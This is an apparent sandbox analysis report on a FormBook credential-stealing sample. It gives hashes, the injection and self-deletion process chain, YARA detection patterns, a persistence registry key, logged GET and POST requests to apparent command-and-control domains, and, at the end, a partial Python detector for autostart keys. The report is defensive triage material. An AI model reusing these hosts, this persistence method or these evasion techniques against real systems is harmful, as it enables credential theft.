
Analysis Report ScanRFQ_569585.exe

Overview

General Information

Sample Name: ScanRFQ_569585.exe
MD5: fff36af0c29e1e45b4ed519f0e7dfbfb
SHA1: af7cb2dc654e284e0a4902d9e1ab7edf6bee506c
SHA256: a83ded2c7e7d33354eb933f465d2e300c1047bb8470b3bc7beb7dae83228b3e0

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Benign windows process drops PE files
Detected FormBook malware
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
Creates an undocumented autostart registry key
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Sigma detected: File Created with System Process Name
Tries to detect virtualization through RDTSC time measurements
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file access)
Checks for kernel debuggers (NtQuerySystemInformation(SystemKernelDebuggerInformation))
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Found evasive API chain (may stop execution after checking a module file name)
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains strange resources
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Tries to load missing DLLs
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w7
  • ScanRFQ_569585.exe (PID: 3772 cmdline: 'C:\Users\user\Desktop\ScanRFQ_569585.exe' MD5: FFF36AF0C29E1E45B4ED519F0E7DFBFB)
    • explorer.exe (PID: 1216 cmdline: MD5: 6DDCA324434FFA506CF7DC4E51DB7935)
      • autochk.exe (PID: 3860 cmdline: C:\Windows\System32\autochk.exe MD5: F88A52EB62019D6A62FDD9E08034DBD8)
      • cmd.exe (PID: 3868 cmdline: C:\Windows\System32\cmd.exe MD5: AD7B9C14083B52BC532FBA5948342B98)
        • cmd.exe (PID: 3880 cmdline: /c del 'C:\Users\user\Desktop\ScanRFQ_569585.exe' MD5: AD7B9C14083B52BC532FBA5948342B98)
        • firefox.exe (PID: 4036 cmdline: C:\Program Files\Mozilla Firefox\Firefox.exe MD5: 594F91C5985AC402ECD2D7F1376AFFFD)
      • winb2k.exe (PID: 4056 cmdline: C:\Program Files\Modpl\winb2k.exe MD5: FFF36AF0C29E1E45B4ED519F0E7DFBFB)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000008.00000002.963764041.00B60000.00000040.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000008.00000002.963764041.00B60000.00000040.00000001.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
    • 0x817b9:$sqlite3step: 68 34 1C 7B E1
    • 0x818cc:$sqlite3step: 68 34 1C 7B E1
    • 0x817e8:$sqlite3text: 68 38 2A 90 C5
    • 0x8190d:$sqlite3text: 68 38 2A 90 C5
    • 0x817fb:$sqlite3blob: 68 53 D8 7F 8C
    • 0x81923:$sqlite3blob: 68 53 D8 7F 8C
00000008.00000002.963764041.00B60000.00000040.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
    • 0x73248:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x734b2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x7eb35:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x7e621:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x7ec37:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x7edaf:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x7402a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x7d89c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0x749c3:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x83ea7:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x84eaa:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000000.00000002.733297708.000D4000.00000040.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000000.00000002.733297708.000D4000.00000040.00000001.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
      • 0x161b1:$sqlite3step: 68 34 1C 7B E1
      • 0x162c4:$sqlite3step: 68 34 1C 7B E1
      • 0x161e0:$sqlite3text: 68 38 2A 90 C5
      • 0x16305:$sqlite3text: 68 38 2A 90 C5
      • 0x161f3:$sqlite3blob: 68 53 D8 7F 8C
      • 0x1631b:$sqlite3blob: 68 53 D8 7F 8C

      Sigma Overview


      System Summary:

Sigma detected: File Created with System Process Name
Source: File created, Author: Sander Wiebing, Data: EventID: 11, Image: C:\Windows\explorer.exe, ProcessId: 1216, TargetFilename: C:\Users\user\AppData\Local\Temp\Modpl

      Signature Overview


AV Detection:

Multi AV Scanner detection for domain / URL
Source: www.towing-oxnard.com, Virustotal: Detection: 6%
Source: http://www.chilogae.com/q44/, Virustotal: Detection: 6%
Source: http://www.towing-oxnard.com, Virustotal: Detection: 6%
Multi AV Scanner detection for dropped file
Source: C:\Program Files\Modpl\winb2k.exe, Virustotal: Detection: 84%
Source: C:\Program Files\Modpl\winb2k.exe, ReversingLabs: Detection: 74%
Source: C:\Users\user\AppData\Local\Temp\Modpl\winb2k.exe, Virustotal: Detection: 84%
Source: C:\Users\user\AppData\Local\Temp\Modpl\winb2k.exe, ReversingLabs: Detection: 74%
Multi AV Scanner detection for submitted file
Source: ScanRFQ_569585.exe, Virustotal: Detection: 84%
Source: ScanRFQ_569585.exe, ReversingLabs: Detection: 74%
Yara detected FormBook
Source: Yara match, File source: 00000008.00000002.963764041.00B60000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000000.00000002.733297708.000D4000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000000.00000002.733930625.00340000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000000.00000002.733557555.00190000.00000040.00000001.sdmp, type: MEMORY
Machine Learning detection for dropped file
Source: C:\Program Files\Modpl\winb2k.exe, Joe Sandbox ML: detected
Machine Learning detection for sample
Source: ScanRFQ_569585.exe, Joe Sandbox ML: detected

Source: C:\Users\user\Desktop\ScanRFQ_569585.exe, Code function: 4x nop then jmp 0243B9BEh, 0_2_023A45E6
Source: C:\Users\user\Desktop\ScanRFQ_569585.exe, Code function: 4x nop then jmp 023B7098h, 0_2_023B7072
Source: C:\Program Files\Mozilla Firefox\firefox.exe, Code function: 4x nop then pop edi, 8_2_00BDF870
Source: C:\Program Files\Mozilla Firefox\firefox.exe, Code function: 4x nop then pop ebx, 8_2_00BD1050
Source: C:\Program Files\Mozilla Firefox\firefox.exe, Code function: 4x nop then pop edi, 8_2_00BE09B9
Source: C:\Program Files\Mozilla Firefox\firefox.exe, Code function: 4x nop then pop edi, 8_2_00BD79A0
Source: C:\Program Files\Mozilla Firefox\firefox.exe, Code function: 4x nop then pop edi, 8_2_00BD799B
Source: C:\Program Files\Mozilla Firefox\firefox.exe, Code function: 4x nop then pop edi, 8_2_00BE09C0
Source: C:\Program Files\Mozilla Firefox\firefox.exe, Code function: 4x nop then pop esi, 8_2_00BE03D0
Source: C:\Program Files\Mozilla Firefox\firefox.exe, Code function: 4x nop then pop edi, 8_2_00BE0B79
Source: C:\Program Files\Mozilla Firefox\firefox.exe, Code function: 4x nop then pop edi, 8_2_00BE0B77

Source: global traffic, HTTP traffic detected: GET /q44/?2d3DUfw0=4Ih2eMp+f/37MhBpkS5xp23hk1Pa4taZMcF4C66VkQnB59o9kPrcve7f/V92cg7usAs5Jw==&1b=v01L_rWpTzu0 HTTP/1.1, Host: www.towing-oxnard.com, Connection: close, Data Raw: 00 00 00 00 00 00, Data Ascii:
Source: global traffic, HTTP traffic detected: GET /q44/?2d3DUfw0=Gr8IwLa7RqsgrihTvqDsVY5skmR0Y5HSw0/AoDPiUQ1S9e8T86NEm74RfyN6xMX4+Cl88A==&1b=v01L_rWpTzu0&sql=1 HTTP/1.1, Host: www.schoolpsych4u.com, Connection: close, Data Raw: 00 00 00 00 00 00, Data Ascii:
Source: Joe Sandbox View, IP Address: 35.242.251.130
Source: Joe Sandbox View, ASN Name: unknown
Source: unknown, DNS traffic detected: queries for: www.congresoflebologia.com
Source: unknown, HTTP traffic detected: POST /q44/ HTTP/1.1, Host: www.schoolpsych4u.com, Connection: close, Content-Length: 165826, Cache-Control: no-cache, Origin: http://www.schoolpsych4u.com, User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko, Content-Type: application/x-www-form-urlencoded, Accept: */*, Referer: http://www.schoolpsych4u.com/q44/, Accept-Language: en-US, Accept-Encoding: gzip, deflate

E-Banking Fraud:

Yara detected FormBook
Source: Yara match, File source: 00000008.00000002.963764041.00B60000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000000.00000002.733297708.000D4000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000000.00000002.733930625.00340000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000000.00000002.733557555.00190000.00000040.00000001.sdmp, type: MEMORY

System Summary:

Detected FormBook malware
Source: C:\Windows\System32\cmd.exe, Dropped file: C:\Users\user\AppData\Roaming\-6R-1S2U\-6Rlogri.ini
Source: C:\Windows\System32\cmd.exe, Dropped file: C:\Users\user\AppData\Roaming\-6R-1S2U\-6Rlogrv.ini
Source: C:\Program Files\Mozilla Firefox\firefox.exe, Dropped file: C:\Users\user\AppData\Roaming\-6R-1S2U\-6Rlogrf.ini
Malicious sample detected (through community Yara rule)
Source: 00000008.00000002.963764041.00B60000.00000040.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
Source: 00000008.00000002.963764041.00B60000.00000040.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.733297708.000D4000.00000040.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.733297708.000D4000.00000040.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.733930625.00340000.00000040.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.733930625.00340000.00000040.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.733557555.00190000.00000040.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.733557555.00190000.00000040.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: C:\Users\user\Desktop\ScanRFQ_569585.exe, Code function: 0_2_023B6070 NtResumeThread,NtResumeThread, 0_2_023B6070
Source: C:\Users\user\Desktop\ScanRFQ_569585.exe, Code function: 0_2_023B6130 NtSetContextThread,NtSetContextThread, 0_2_023B6130
Source: C:\Users\user\Desktop\ScanRFQ_569585.exe, Code function: 0_2_023B6460 NtSuspendThread,NtSuspendThread, 0_2_023B6460
Source: C:\Users\user\Desktop\ScanRFQ_569585.exe, Code function: 0_2_023B6580 NtUnmapViewOfSection,NtUnmapViewOfSection, 0_2_023B6580
Source: C:\Users\user\Desktop\ScanRFQ_569585.exe, Code function: 0_2_023B4E30 NtAdjustPrivilegesToken,NtAdjustPrivilegesToken, 0_2_023B4E30
Source: C:\Users\user\Desktop\ScanRFQ_569585.exe, Code function: 0_2_023B4EA0 NtAllocateVirtualMemory,NtAllocateVirtualMemory, 0_2_023B4EA0
Source: C:\Users\user\Desktop\ScanRFQ_569585.exe, Code function: 0_2_023B52B0 NtCreateSection,NtCreateSection, 0_2_023B52B0
Source: C:\Users\user\Desktop\ScanRFQ_569585.exe, Code function: 0_2_023B5390 NtDelayExecution,NtDelayExecution, 0_2_023B5390
Source: C:\Users\user\Desktop\ScanRFQ_569585.exe, Code function: 0_2_023B5090 NtClose,NtClose, 0_2_023B5090
Source: C:\Users\user\Desktop\ScanRFQ_569585.exe, Code function: 0_2_023B5190 NtCreateFile,NtCreateFile, 0_2_023B5190
Source: C:\Users\user\Desktop\ScanRFQ_569585.exe, Code function: 0_2_023B57F0 NtMapViewOfSection,NtMapViewOfSection, 0_2_023B57F0
Source: C:\Users\user\Desktop\ScanRFQ_569585.exe, Code function: 0_2_023B55A0 NtFreeVirtualMemory, 0_2_023B55A0
Source: C:\Users\user\Desktop\ScanRFQ_569585.exe, Code function: 0_2_023B5E40 NtQueueApcThread,NtQueueApcThread, 0_2_023B5E40
Source: C:\Users\user\Desktop\ScanRFQ_569585.exe, Code function: 0_2_023B5E80 NtReadFile,NtReadFile, 0_2_023B5E80
Source: C:\Users\user\Desktop\ScanRFQ_569585.exe, Code function: 0_2_023B5EC0 NtReadVirtualMemory,NtReadVirtualMemory, 0_2_023B5EC0
Source: C:\Users\user\Desktop\ScanRFQ_569585.exe, Code function: 0_2_023B5C10 NtQueryInformationProcess,NtQueryInformationProcess, 0_2_023B5C10
Source: C:\Users\user\Desktop\ScanRFQ_569585.exe, Code function: 0_2_023B5DC0 NtQuerySystemInformation,NtQuerySystemInformation, 0_2_023B5DC0
Source: C:\Users\user\Desktop\ScanRFQ_569585.exe, Code function: 0_2_023B6200 NtSetInformationFile, 0_2_023B6200
Source: C:\Users\user\Desktop\ScanRFQ_569585.exe, Code function: 0_2_023B63D0 NtSetValueKey, 0_2_023B63D0
Source: C:\Users\user\Desktop\ScanRFQ_569585.exe, Code function: 0_2_023B6630 NtWriteFile, 0_2_023B6630
Source: C:\Users\user\Desktop\ScanRFQ_569585.exe, Code function: 0_2_023B6660 NtWriteVirtualMemory, 0_2_023B6660
Source: C:\Users\user\Desktop\ScanRFQ_569585.exe, Code function: 0_2_023B65E0 NtWaitForSingleObject, 0_2_023B65E0
Source: C:\Users\user\Desktop\ScanRFQ_569585.exe, Code function: 0_2_023B5210 NtCreateMutant, 0_2_023B5210
Source: C:\Users\user\Desktop\ScanRFQ_569585.exe, Code function: 0_2_023B5270 NtCreateProcessEx, 0_2_023B5270
Source: C:\Users\user\Desktop\ScanRFQ_569585.exe, Code function: 0_2_023B51D0 NtCreateKey, 0_2_023B51D0
Source: C:\Program Files\Mozilla Firefox\firefox.exe, Code function: 8_2_00BE2820 NtCreateSection, 8_2_00BE2820
Source: C:\Program Files\Mozilla Firefox\firefox.exe, Code function: 8_2_00BE2870 NtMapViewOfSection, 8_2_00BE2870
Source: C:\Program Files\Mozilla Firefox\firefox.exe, Code function: 8_2_00BE2BC0 NtCreateFile, 8_2_00BE2BC0
Source: C:\Program Files\Mozilla Firefox\firefox.exe, Code function: 8_2_00BE2CF0 NtClose, 8_2_00BE2CF0
Source: C:\Program Files\Mozilla Firefox\firefox.exe, Code function: 8_2_00BE2BBA NtCreateFile, 8_2_00BE2BBA
Source: C:\Program Files\Mozilla Firefox\firefox.exe, Code function: 8_2_00BE2CEA NtClose, 8_2_00BE2CEA
      Source: C:\Program Files\Mozilla Firefox\firefox.exeCode function: 8_2_00BE71A08_2_00BE71A0
      Source: C:\Program Files\Mozilla Firefox\firefox.exeCode function: 8_2_00BE6AD28_2_00BE6AD2
      Source: C:\Program Files\Mozilla Firefox\firefox.exeCode function: 8_2_00BE5B268_2_00BE5B26
      Source: C:\Program Files\Mozilla Firefox\firefox.exeCode function: 8_2_00BE5EDB8_2_00BE5EDB
      Source: C:\Program Files\Mozilla Firefox\firefox.exeCode function: 8_2_00BE5F4B8_2_00BE5F4B
      Source: C:\Program Files\Modpl\winb2k.exeCode function: 9_2_00E569029_2_00E56902
      Source: Joe Sandbox View | Dropped File: C:\Program Files\Modpl\winb2k.exe A83DED2C7E7D33354EB933F465D2E300C1047BB8470B3BC7BEB7DAE83228B3E0
      Source: Joe Sandbox View | Dropped File: C:\Users\user\AppData\Local\Temp\Modpl\winb2k.exe A83DED2C7E7D33354EB933F465D2E300C1047BB8470B3BC7BEB7DAE83228B3E0
      Source: C:\Program Files\Mozilla Firefox\firefox.exe | Code function: String function: 00BE4360 appears 39 times
      Source: C:\Users\user\Desktop\ScanRFQ_569585.exe | Code function: String function: 023C2824 appears 73 times
      Source: C:\Users\user\Desktop\ScanRFQ_569585.exe | Code function: String function: 02391ACE appears 87 times
      Source: C:\Users\user\Desktop\ScanRFQ_569585.exe | Code function: String function: 0240F3E2 appears 65 times
      Source: C:\Users\user\Desktop\ScanRFQ_569585.exe | Code function: String function: 023A3D00 appears 38 times
      Source: C:\Users\user\Desktop\ScanRFQ_569585.exe | Code function: String function: 0238F63B appears 156 times
      Source: ScanRFQ_569585.exe | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
      Source: winb2k.exe.2.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
      Source: winb2k.exe0.2.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
      Source: ScanRFQ_569585.exe, 00000000.00000002.733519701.0015B000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenameCmd.Exej% vs ScanRFQ_569585.exe
      Source: ScanRFQ_569585.exe, 00000000.00000003.687909041.02302000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs ScanRFQ_569585.exe
      Source: C:\Windows\System32\cmd.exe | Section loaded: mozglue.dll
      Source: C:\Windows\System32\cmd.exe | Section loaded: winsqlite3.dll
      Source: 00000008.00000002.963764041.00B60000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 00000008.00000002.963764041.00B60000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 00000000.00000002.733297708.000D4000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 00000000.00000002.733297708.000D4000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 00000000.00000002.733930625.00340000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 00000000.00000002.733930625.00340000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 00000000.00000002.733557555.00190000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 00000000.00000002.733557555.00190000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@9/6@5/3
      Source: C:\Windows\explorer.exe | File created: C:\Program Files\Modpl
      Source: C:\Windows\System32\cmd.exe | File created: C:\Users\user\AppData\Roaming\-6R-1S2U
      Source: C:\Windows\explorer.exe | File created: C:\Users\user\AppData\Local\Temp\Modpl
      Source: C:\Windows\System32\cmd.exe | Console Write: ......................0.....4...<........}......................................!...@@ .|....J'.........X....F.J........
      Source: C:\Windows\System32\cmd.exe | Console Write: ....................A.c.c.e.s.s. .i.s. .d.e.n.i.e.d..............n*.....V..J....................#..u....&...`.....,.....
      Source: C:\Users\user\Desktop\ScanRFQ_569585.exe | Command line argument: ShowDib1 (0_2_013712C0)
      Source: C:\Program Files\Modpl\winb2k.exe | Command line argument: ShowDib1 (9_2_00E512C0)
      Source: C:\Program Files\Modpl\winb2k.exe | Command line argument: >7 (9_2_00E53690)
      Source: ScanRFQ_569585.exe | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
      Source: C:\Windows\explorer.exe | File read: C:\Users\desktop.ini
      Source: C:\Users\user\Desktop\ScanRFQ_569585.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
      Source: C:\Windows\explorer.exe | File read: C:\Windows\System32\drivers\etc\hosts
      Source: C:\Windows\System32\cmd.exe | File read: C:\Windows\System32\drivers\etc\hosts
      Source: ScanRFQ_569585.exe | Virustotal: Detection: 84%
      Source: ScanRFQ_569585.exe | ReversingLabs: Detection: 74%
      Source: C:\Users\user\Desktop\ScanRFQ_569585.exe | File read: C:\Users\user\Desktop\ScanRFQ_569585.exe
      Source: unknown | Process created: C:\Users\user\Desktop\ScanRFQ_569585.exe 'C:\Users\user\Desktop\ScanRFQ_569585.exe'
      Source: unknown | Process created: C:\Windows\System32\autochk.exe C:\Windows\System32\autochk.exe
      Source: unknown | Process created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe
      Source: unknown | Process created: C:\Windows\System32\cmd.exe /c del 'C:\Users\user\Desktop\ScanRFQ_569585.exe'
      Source: unknown | Process created: C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\Firefox.exe
      Source: unknown | Process created: C:\Program Files\Modpl\winb2k.exe C:\Program Files\Modpl\winb2k.exe
      Source: C:\Windows\explorer.exe | Process created: C:\Program Files\Modpl\winb2k.exe C:\Program Files\Modpl\winb2k.exe
      Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\cmd.exe /c del 'C:\Users\user\Desktop\ScanRFQ_569585.exe'
      Source: C:\Windows\System32\cmd.exe | Process created: C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\Firefox.exe
      Source: C:\Windows\explorer.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{3ad05575-8857-4850-9277-11b85bdb8e09}\InProcServer32
      Source: C:\Windows\System32\cmd.exe | File written: C:\Users\user\AppData\Roaming\-6R-1S2U\-6Rlogri.ini
      Source: C:\Windows\System32\cmd.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
      Source: C:\Windows\explorer.exe | Directory created: C:\Program Files\Modpl
      Source: C:\Windows\explorer.exe | Directory created: C:\Program Files\Modpl\winb2k.exe
      Source: ScanRFQ_569585.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
      Source: ScanRFQ_569585.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
      Source: ScanRFQ_569585.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
      Source: ScanRFQ_569585.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
      Source: ScanRFQ_569585.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
      Source: ScanRFQ_569585.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
      Source: ScanRFQ_569585.exe | Static PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
      Source: Binary string: cmd.pdb,$ source: ScanRFQ_569585.exe, 00000000.00000002.748532503.013D0000.00000040.00000001.sdmp
      Source: Binary string: ntdll.pdb source: ScanRFQ_569585.exe
      Source: Binary string: C:\Users\Good Gold\Desktop\SHOWDIB1\Release\SHOWDIB1.pdbxx source: ScanRFQ_569585.exe
      Source: Binary string: C:\Users\Good Gold\Desktop\SHOWDIB1\Release\SHOWDIB1.pdb source: ScanRFQ_569585.exe
      Source: Binary string: cmd.pdb source: ScanRFQ_569585.exe, 00000000.00000002.748532503.013D0000.00000040.00000001.sdmp
      Source: Binary string: ntdll.pdb3 source: ScanRFQ_569585.exe, 00000000.00000003.687648611.02220000.00000004.00000001.sdmp
      Source: ScanRFQ_569585.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
      Source: ScanRFQ_569585.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
      Source: ScanRFQ_569585.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
      Source: ScanRFQ_569585.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
      Source: ScanRFQ_569585.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

      Source: C:\Users\user\Desktop\ScanRFQ_569585.exe | Code function: 0_2_0137463A EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer
      Source: C:\Users\user\Desktop\ScanRFQ_569585.exe | Code function: 0_2_013731C5 push ecx; ret 0_2_013731D8
      Source: C:\Users\user\Desktop\ScanRFQ_569585.exe | Code function: 0_2_023C2869 push ecx; ret 0_2_023C287C
      Source: C:\Program Files\Modpl\winb2k.exe | Code function: 9_2_00E531C5 push ecx; ret 9_2_00E531D8

      Source: C:\Windows\explorer.exe | File created: C:\Program Files\Modpl\winb2k.exe
      Source: C:\Windows\explorer.exe | File created: C:\Users\user\AppData\Local\Temp\Modpl\winb2k.exe

      Boot Survival:

      Creates an undocumented autostart registry key
      Source: C:\Windows\System32\cmd.exe | Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run JNUDV4J0C
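The Policies\Explorer\Run key written above is honoured by Explorer at logon like the ordinary Run key, but legitimate installers almost never use it, so its mere presence is a triage signal and a plain registry export is enough to find it on a live host. The following Python is an added example, not Joe Sandbox or FormBook code: it parses a constructed reg.exe-style export and flags the entry. The value name JNUDV4J0C and the C:\Program Files\Modpl\winb2k.exe path follow this report, the SecurityHealth entry is a constructed benign control, and the generated-name regex is a heuristic assumption.

```python
r"""Flag autostart values in a Windows registry export (reg.exe text format).

Added example for this report; not Joe Sandbox or FormBook code. The export
below is constructed: the Policies\Explorer\Run value follows the report's
finding, the Run value is a benign control.
"""
import re

# Autostart keys and whether they are a documented Run location. The Policies
# variant is still executed by Explorer at logon but is almost never written by
# legitimate installers, so any value under it deserves a look.
AUTORUN_KEYS = {
    r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run": "documented",
    r"HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run": "documented",
    r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run": "undocumented",
    r"HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run": "undocumented",
}

# Heuristic (assumption): generated value names such as JNUDV4J0C are short
# runs of upper-case letters and digits containing at least one digit.
GENERATED_NAME_RE = re.compile(r"^(?=.*\d)[A-Z0-9]{6,12}$")

KEY_RE = re.compile(r"^\[(?P<key>[^\]]+)\]$")
VALUE_RE = re.compile(r'^"(?P<name>[^"]+)"="(?P<data>.*)"$')

# Constructed export in the format written by:
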